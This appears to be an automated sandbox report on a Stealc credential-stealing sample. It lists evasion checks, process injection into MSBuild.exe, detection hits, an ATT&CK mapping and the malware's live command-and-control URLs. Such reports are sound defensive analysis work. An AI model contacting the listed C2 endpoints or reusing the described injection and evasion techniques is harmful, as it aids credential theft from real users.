Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\Aew8SXjXEb.exe

API coverage: 4.2 %

Source: C:\Users\user\Desktop\Aew8SXjXEb.exe

Code function: 0_2_00639ABF FindFirstFileExW,

0_2_00639ABF

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 1_2_00401160 GetSystemInfo,

1_2_00401160

Source: Amcache.hve.6.dr	Binary or memory string: VMware
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.6.dr	Binary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
Source: Amcache.hve.6.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.6.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.6.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013F1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.6.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.6.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.6.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.6.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: MSBuild.exe, 00000001.00000002.1494298167.0000000001397000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: Amcache.hve.6.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.6.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: MSBuild.exe, 00000001.00000002.1494298167.0000000001397000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwareP
Source: Amcache.hve.6.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: MSBuild.exe, 00000001.00000002.1494298167.0000000001397000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW@
Source: Amcache.hve.6.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\Aew8SXjXEb.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\Aew8SXjXEb.exe

Code function: 0_2_00627922 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00627922

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 1_2_004045C0 VirtualProtect ?,00000004,00000100,00000000

1_2_004045C0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

1_2_0041C03D

Source: C:\Users\user\Desktop\Aew8SXjXEb.exe	Code function: 0_2_00622003 mov edi, dword ptr fs:[00000030h]	0_2_00622003
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe	Code function: 0_2_0063A64C mov eax, dword ptr fs:[00000030h]	0_2_0063A64C
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe	Code function: 0_2_00666628 mov eax, dword ptr fs:[00000030h]	0_2_00666628
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe	Code function: 0_2_00630F2E mov ecx, dword ptr fs:[00000030h]	0_2_00630F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_00419750 mov eax, dword ptr fs:[00000030h]	1_2_00419750

Source: C:\Users\user\Desktop\Aew8SXjXEb.exe

Code function: 0_2_0063CC4B GetProcessHeap,

0_2_0063CC4B

Source: C:\Users\user\Desktop\Aew8SXjXEb.exe	Code function: 0_2_00627610 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00627610
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe	Code function: 0_2_00627922 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00627922
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe	Code function: 0_2_0062DA73 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0062DA73
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe	Code function: 0_2_00627AAF SetUnhandledExceptionFilter,	0_2_00627AAF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_0041AD48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0041CEEA SetUnhandledExceptionFilter,	1_2_0041CEEA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0041B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_0041B33A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: Aew8SXjXEb.exe PID: 6032, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 2332, type: MEMORYSTR

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\Aew8SXjXEb.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Aew8SXjXEb.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Aew8SXjXEb.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 41E000	Jump to behavior
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 42B000	Jump to behavior
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 65C000	Jump to behavior
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: EF7008	Jump to behavior

Source: C:\Users\user\Desktop\Aew8SXjXEb.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

Jump to behavior

Source: C:\Users\user\Desktop\Aew8SXjXEb.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	0_2_0063C085
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe	Code function: GetLocaleInfoW,	0_2_0063622B
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe	Code function: EnumSystemLocalesW,	0_2_0063C372
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe	Code function: EnumSystemLocalesW,	0_2_0063C327
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe	Code function: EnumSystemLocalesW,	0_2_0063C40D
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_0063C498
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe	Code function: GetLocaleInfoW,	0_2_0063C6EB
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_0063C814
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe	Code function: GetLocaleInfoW,	0_2_0063C91A
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_0063C9E9
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe	Code function: EnumSystemLocalesW,	0_2_00635D7F

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\Aew8SXjXEb.exe

Code function: 0_2_00627815 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00627815

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 1_2_00417850 GetUserNameA,

1_2_00417850

Source: Amcache.hve.6.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 0.2.Aew8SXjXEb.exe.64dad8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Aew8SXjXEb.exe.64dad8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Aew8SXjXEb.exe.620000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1494298167.0000000001397000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 2332, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0.2.Aew8SXjXEb.exe.64dad8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Aew8SXjXEb.exe.64dad8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Aew8SXjXEb.exe.620000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1494298167.0000000001397000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 2332, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	311 Process Injection	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	12 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Virtualization/Sandbox Evasion	LSASS Memory	41 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Disable or Modify Tools	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	311 Process Injection	NTDS	1 Account Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 System Owner/User Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Obfuscated Files or Information	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Software Packing	DCSync	23 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label
Aew8SXjXEb.exe	32%	ReversingLabs	Win32.Trojan.Generic
Aew8SXjXEb.exe	100%	Avira	HEUR/AGEN.1310458
Aew8SXjXEb.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://upx.sf.net	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bg.microsoft.map.fastly.net	199.232.214.172	true	false	unknown
s-part-0044.t-0009.fb-t-msedge.net	13.107.253.72	true	false	unknown
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://62.204.41.150/	true		unknown
http://62.204.41.150/edd20096ecef326d.php	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://62.204.41.150/L	MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://62.204.41.150ig	MSBuild.exe, 00000001.00000002.1494298167.0000000001397000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://62.204.41.150/edd20096ecef326d.php0	MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://62.204.41.150/S	MSBuild.exe, 00000001.00000002.1494298167.0000000001397000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://62.204.41.150/edd20096ecef326d.php;	MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://62.204.41.150/Y	MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://62.204.41.150/edd20096ecef326d.php5	MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://62.204.41.150/edd20096ecef326d.phpu	MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://62.204.41.150/z	MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://62.204.41.150G	MSBuild.exe, 00000001.00000002.1494298167.0000000001397000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://upx.sf.net	Amcache.hve.6.dr	false	URL Reputation: safe	unknown
http://62.204.41.150	MSBuild.exe, 00000001.00000002.1494298167.0000000001397000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://62.204.41.150/edd20096ecef326d.phpx&	MSBuild.exe, 00000001.00000002.1494298167.00000000013F1000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://62.204.41.150E	MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://62.204.41.150/edd20096ecef326d.phpi	MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://62.204.41.150/J	MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://62.204.41.150/edd20096ecef326d.phpoca.	MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
62.204.41.150	unknown	United Kingdom		30798	TNNET-ASTNNetOyMainnetworkFI	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1528328
Start date and time:	2024-10-07 19:32:10 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 6s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Aew8SXjXEb.exe renamed because original name is a hash value
Original Sample Name:	c89c82ab6576a83a2a32bbffe44ef4d7.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@4/5@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 20 Number of non-executed functions: 71
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.190.160.17, 40.126.32.76, 20.190.160.20, 40.126.32.74, 20.190.160.14, 40.126.32.68, 40.126.32.72, 40.126.32.134, 2.16.164.97, 2.16.164.105, 192.229.221.95, 20.42.73.29, 52.149.20.212, 2.23.209.181, 2.23.209.154, 2.23.209.160, 2.23.209.183, 2.23.209.176, 2.23.209.177, 2.23.209.158, 2.23.209.150, 2.23.209.182, 13.85.23.206, 52.165.164.15, 2.23.209.149, 2.23.209.135, 2.23.209.179, 2.23.209.141, 199.232.214.172, 93.184.221.240
Excluded domains from analysis (whitelisted): crl.edge.digicert.com, azurefd-t-fb-prod.trafficmanager.net, slscr.update.microsoft.com, otelrules.afd.azureedge.net, a767.dspw65.akamai.net, wu.azureedge.net, e86303.dscx.akamaiedge.net, ocsp.digicert.com, www.bing.com.edgekey.net, login.live.com, ocsp.edge.digicert.com, onedsblobprdeus15.eastus.cloudapp.azure.com, glb.cws.prod.dcat.dsp.trafficmanager.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, www.bing.com, prdv4a.aadg.msidentity.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, www.tm.v4.a.prd.aadg.akadns.net, wu.ec.azureedge.net, ctldl.windowsupdate.com, www-www.bing.com.trafficmanager.net, login.msa.msidentity.com, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, blobcollector.events.data.trafficmanager.net, azureedge-t-prod.traffic
Not all processes where analyzed, report is missing behavior information
VT rate limit hit for: Aew8SXjXEb.exe

Simulations

Behavior and APIs

Time	Type	Description
13:33:20	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
62.204.41.150	RJQySowVRb.exe	Get hash	malicious	Stealc	Browse	62.204.41.150/edd20096ecef326d.php
	1f13Cs1ogc.exe	Get hash	malicious	Stealc	Browse	62.204.41.150/edd20096ecef326d.php
	5rVhexjLCx.exe	Get hash	malicious	Stealc	Browse	62.204.41.150/edd20096ecef326d.php
	file.exe	Get hash	malicious	Stealc	Browse	62.204.41.150/edd20096ecef326d.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
fp2e7a.wpc.phicdn.net	https://dsdhie.org/dsjhem	Get hash	malicious	Unknown	Browse	192.229.221.95
	TuQlz67byH.exe	Get hash	malicious	LummaC	Browse	192.229.221.95
	f1r6P3j3g7.exe	Get hash	malicious	LummaC, Vidar	Browse	192.229.221.95
	lCVFGKfczi.exe	Get hash	malicious	Vidar	Browse	192.229.221.95
	1f13Cs1ogc.exe	Get hash	malicious	Stealc	Browse	192.229.221.95
	NdSXVNeoET.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	192.229.221.95
	VLSiVR4Qxs.exe	Get hash	malicious	LummaC, Vidar	Browse	192.229.221.95
	5rVhexjLCx.exe	Get hash	malicious	Stealc	Browse	192.229.221.95
	https://forms.office.com/Pages/ShareFormPage.aspx?id=W8eUhlA4rUOuklSyoCn21mtmgAvPzYFJuSM99R6gX3dUQ1IyWUM1UUhTS1pWQ0xXNkI3RzlRRkFIVi4u&sharetoken=93tGEOrxpFy3X0nnxFcr	Get hash	malicious	HTMLPhisher	Browse	192.229.221.95
	file.exe	Get hash	malicious	Vidar	Browse	192.229.221.95
bg.microsoft.map.fastly.net	Adobe-Setup.msi	Get hash	malicious	Korplug	Browse	199.232.210.172
	https://dsdhie.org/dsjhem	Get hash	malicious	Unknown	Browse	199.232.214.172
	TuQlz67byH.exe	Get hash	malicious	LummaC	Browse	199.232.210.172
	45Ywq5ad5H.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	199.232.214.172
	f1r6P3j3g7.exe	Get hash	malicious	LummaC, Vidar	Browse	199.232.214.172
	lCVFGKfczi.exe	Get hash	malicious	Vidar	Browse	199.232.214.172
	1f13Cs1ogc.exe	Get hash	malicious	Stealc	Browse	199.232.214.172
	NdSXVNeoET.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	199.232.210.172
	vEcIHT68pU.exe	Get hash	malicious	LummaC	Browse	199.232.214.172
